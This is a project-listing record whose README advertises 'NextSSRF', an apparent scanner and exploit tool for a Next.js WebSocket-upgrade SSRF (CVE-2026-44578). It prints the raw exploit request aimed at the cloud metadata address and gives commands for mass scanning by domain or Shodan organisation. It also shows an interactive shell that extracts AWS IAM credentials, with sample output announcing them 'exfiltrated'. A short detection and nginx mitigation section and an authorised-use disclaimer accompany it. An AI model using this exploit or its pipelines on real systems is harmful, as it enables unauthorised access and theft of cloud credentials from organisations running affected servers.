[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-79995":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":10,"languages":9,"totalLinesOfCode":9,"stars":11,"forks":12,"watchers":13,"openIssues":14,"contributorsCount":15,"subscribersCount":15,"size":15,"stars1d":15,"stars7d":14,"stars30d":16,"stars90d":15,"forks30d":15,"starsTrendScore":17,"compositeScore":18,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":19,"fork":19,"defaultBranch":20,"hasWiki":21,"hasPages":19,"topics":22,"createdAt":9,"pushedAt":9,"updatedAt":23,"readmeContent":24,"aiSummary":25,"trendingCount":15,"starSnapshotCount":15,"syncStatus":14,"lastSyncTime":26,"discoverSource":27},79995,"nextssrf","ynsmroztas\u002Fnextssrf","ynsmroztas","NextSSRF — CVE-2026-44578 Scanner & Exploit          ║ ║   Next.js WebSocket Upgrade Handler SSRF",null,"Python",74,17,71,2,0,3,1,3.77,false,"main",true,[],"2026-06-12 02:03:56","\u003Cdiv align=\"center\">\n\n```\n╔══════════════════════════════════════════════════════════════╗\n║         NextSSRF — CVE-2026-44578 Scanner & Exploit          ║\n║   Next.js WebSocket Upgrade Handler SSRF                     ║\n║   Affected: 13.4.13 → 15.5.15, 16.0.0 → 16.2.4              ║\n║         @mitsec \u002F ynsmroztas — Bug Bounty Tooling            ║\n╚══════════════════════════════════════════════════════════════╝\n```\n\n![Python](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fpython-3.10+-blue?style=flat-square&logo=python)\n![CVE](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVE-2026--44578-red?style=flat-square)\n![CVSS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCVSS-8.6_High-orange?style=flat-square)\n![License](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Flicense-MIT-green?style=flat-square)\n![Platform](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002Fplatform-Linux%20%7C%20Windows%20%7C%20Android-lightgrey?style=flat-square)\n\n**CVE-2026-44578** — Server-Side Request Forgery 
via Next.js WebSocket Upgrade Handler\n\n[Overview](#overview) · [Install](#install) · [Usage](#usage) · [Pipeline](#pipeline) · [Shodan](#shodan) · [Interactive](#interactive-shell) · [Disclaimer](#disclaimer)\n\n\u003C\u002Fdiv>\n\n---\n\n## Overview\n\nOn May 11, 2026, Vercel patched **CVE-2026-44578** (CVSS 8.6): an unauthenticated SSRF in Next.js's WebSocket upgrade handler affecting all self-hosted deployments from **13.4.13** onward.\n\n### Mechanism\n\n```\nGET http:\u002F\u002F169.254.169.254\u002Flatest\u002Fmeta-data\u002F HTTP\u002F1.1   ← absolute-form URI\nHost: vulnerable-nextjs.com\nConnection: Upgrade\nUpgrade: websocket\nSec-WebSocket-Version: 13\nSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\n```\n\nThe `\u002F\u002F` in `http:\u002F\u002F` triggers `normalizeRepeatedSlashes` early-exit, setting `statusCode: 308` and `finished: true`. The vulnerable upgrade handler **ignores both flags** and calls `proxyRequest` when `parsedUrl.protocol` is truthy — proxying the request to the attacker-controlled host on **port 80**.\n\n```diff\n\u002F\u002F router-server.ts (vulnerable)\n- if (parsedUrl.protocol) {\n-     return await proxyRequest(req, socket, parsedUrl, head)\n+ if (finished && parsedUrl.protocol) {\n+     if (!statusCode) {\n+         return await proxyRequest(req, socket, parsedUrl, head)\n```\n\n### Affected Versions\n\n| Product         | Vulnerable         | Fixed    |\n|-----------------|--------------------|----------|\n| Next.js         | 13.4.13 – 15.5.15  | 15.5.16  |\n| Next.js         | 16.0.0 – 16.2.4    | 16.2.5   |\n| Vercel-hosted   | ✅ NOT affected     | N\u002FA      |\n\n### Limitations\n\n- **GET only** (no POST\u002FPUT)\n- **Port 80 only** (explicit ports stripped by URL normalization)\n- AWS **IMDSv2** not exploitable (requires PUT token)\n- GCP metadata rejects `Upgrade: websocket` with 400\n- Reverse proxies (nginx\u002Fcaddy\u002FHAProxy) block absolute-form URIs\n\n---\n\n## Demo\n\n![NextSSRF — AWS Credentials 
Exfiltrated](nextssrf.jpg)\n\n> AWS IMDSv1 credentials exfiltrated via CVE-2026-44578 — interactive exploit shell\n\n---\n\n## Install\n\n```bash\ngit clone https:\u002F\u002Fgithub.com\u002Fynsmroztas\u002Fnextssrf\ncd nextssrf\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n> **Zero dependencies** — Python stdlib only. Python 3.10+ required.\n\n---\n\n## Usage\n\n### Single Target Scan\n\n```bash\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n### Cloud-Specific Targeting\n\n```bash\n# AWS metadata only\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --cloud aws\n\n# Custom internal target\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com \\\n  --ssrf-host http:\u002F\u002Finternal-api --path \u002Fadmin\n\n# Deep scan (+ internal services)\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --cloud aws --deep\n```\n\n### Mass Scan (Pipeline)\n\n```bash\n# subfinder + httpx + nextssrf\nsubfinder -d target.com | httpx -silent | \\\n  python3 nextssrf.py --pipe --threads 20 --cloud aws -o results.jsonl\n\n# File input\npython3 nextssrf.py -f targets.txt --threads 15 -o results.json\n\n# Force scan (even if version unknown)\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --force\n```\n\n### Exit Codes\n\n| Code | Meaning                |\n|------|------------------------|\n| `0`  | Not vulnerable \u002F clean |\n| `1`  | Vulnerable (no exploit)|\n| `2`  | SSRF confirmed         |\n\n---\n\n\n## Interactive Shell\n\nAdvanced exploit shell with auto cloud detection and IAM credential extraction:\n\n```bash\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com\n```\n\n```\n╔══════════════════════════════════════════════════╗\n║  NextSSRF v2 — Interactive Exploit Shell         ║\n║  Target : ec2-x-x-x-x.compute.amazonaws.com     ║\n║  CVE    : CVE-2026-44578  |  Status: Connected   ║\n╚══════════════════════════════════════════════════╝\n\nnextssrf(ec2-x...)> cloud\n  [>] Detecting cloud provider...\n  ✓ AWS — matched: ['ami-id', 
'instance-id', 'iam\u002F', 'hostname']\n  → Run 'aws' for full credential extraction\n\nnextssrf(ec2-x...)> aws\n  [1\u002F3] Instance Information\n  [200] Hostname    : ip-172-31-47-134.ec2.internal\n  [200] AZ          : us-east-1d\n  [200] Account ID  : {\"AccountId\": \"370741706736\"}\n\n  [2\u002F3] IAM Role Discovery\n  ✓ IAM Role found: my-ec2-role\n\n  [3\u002F3] Credential Extraction\n  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓\n  🎯 AWS CREDENTIALS EXFILTRATED!\n  ▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓\n  AccessKeyId : ASIAXXXXXXXXXXXXXXXXXX\n  SecretKey   : xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n  Expiration  : 2026-05-14T22:32:22Z\n```\n\n### Shell Commands\n\n| Command        | Description                              |\n|----------------|------------------------------------------|\n| `cloud`        | Auto-detect cloud (AWS\u002FAzure\u002FGCP\u002FDO\u002FOCI) |\n| `aws`          | Full AWS IAM credential chain            |\n| `azure`        | Azure managed identity token             |\n| `scan`         | Cloud detect + auto exploit              |\n| `url \u003Chttp:\u002F\u002F>`| Custom SSRF request                      |\n| `get \u003CN>`      | AWS IMDS target by index                 |\n| `list`         | Show all IMDS endpoints                  |\n| `history`      | Request history                          |\n| `save`         | Export session to JSON                   |\n| `quit`         | Exit                                     |\n\n### Auto Mode\n\n```bash\n# Detect cloud + run full exploit chain automatically\npython3 nextssrf.py -t https:\u002F\u002Ftarget.com --auto\n```\n\n---\n\n## Pipeline Examples\n\n```bash\n# Full recon → exploit pipeline\nsubfinder -d target.com \\\n  | httpx -silent -server \\\n  | grep -i \"next\" \\\n  | python3 nextssrf.py --pipe --cloud aws --deep -o findings.jsonl\n\n# Shodan mass scan → interactive on confirmed hosts\npython3 shodan_nextjs.py --key KEY --org \"TargetCorp\" \\\n  | python3 nextssrf.py --pipe --cloud aws -o 
hits.jsonl\n\n# Check specific version range\ncat hosts.txt \\\n  | python3 nextssrf.py --pipe --force --cloud aws \\\n  | jq '.[] | select(.ssrf_hits | length > 0)'\n```\n\n---\n\n## Detection (Blue Team)\n\nSigns of exploitation in logs:\n\n```\n# Next.js process logs\nFailed to proxy http:\u002F   ← single slash = normalization fingerprint\n\n# Access logs (absolute-form URI + Upgrade header)\nGET http:\u002F\u002F169.254.169.254\u002F... HTTP\u002F1.1\nConnection: Upgrade\nUpgrade: websocket\n```\n\n### Mitigation (if you can't patch)\n\n```nginx\n# Nginx: reject absolute-form request URIs\nif ($request_uri ~* \"^https?:\u002F\u002F\") {\n    return 400;\n}\n```\n\n---\n\n## References\n\n- [GHSA-c4j6-fc7j-m34r](https:\u002F\u002Fgithub.com\u002Fvercel\u002Fnext.js\u002Fsecurity\u002Fadvisories\u002FGHSA-c4j6-fc7j-m34r)\n- [NVD CVE-2026-44578](https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2026-44578)\n- [Next.js Security Release May 2026](https:\u002F\u002Fnextjs.org\u002Fblog\u002Fsecurity-release-2026-05)\n- [Hadrian Technical Analysis](https:\u002F\u002Fhadrian.io\u002Fblog\u002Fnext-js-websocket-ssrf-unauthenticated-access-to-internal-resources-cve-2026-44578-2)\n\n---\n\n## Disclaimer\n\n> **For authorized security testing and bug bounty research only.**\n> Use only against systems you own or have explicit written permission to test.\n> The authors are not responsible for misuse or unauthorized use.\n> Always follow your bug bounty program's rules of engagement.\n\n---\n\n\u003Cdiv align=\"center\">\n\nMade with ❤️ by [@mitsec](https:\u002F\u002Fgithub.com\u002Fynsmroztas) · [ynsmroztas.github.io](https:\u002F\u002Fynsmroztas.github.io)\n\n**Top Hacker @ Intigriti · 100+ HOF · 2430+ Vulnerabilities · 1100+ P1 Critical**\n\n\u003C\u002Fdiv>\n","NextSSRF is a scanner and exploitation tool for CVE-2026-44578, a vulnerability in the WebSocket upgrade handler of Next.js that leads to server-side request forgery (SSRF). The project is written in Python and can detect and exploit the vulnerability in affected versions (13.4.13 through 15.5.15 and 16.0.0 through 16.2.4). Its core functionality is to trigger the SSRF by sending specially formatted HTTP requests and then carry out further attack operations. It is intended for security researchers and penetration testers assessing and hardening the security of applications built on Next.js. Note that this tool is intended only for legally authorized security testing.","2026-06-11 03:58:50","CREATED_QUERY"]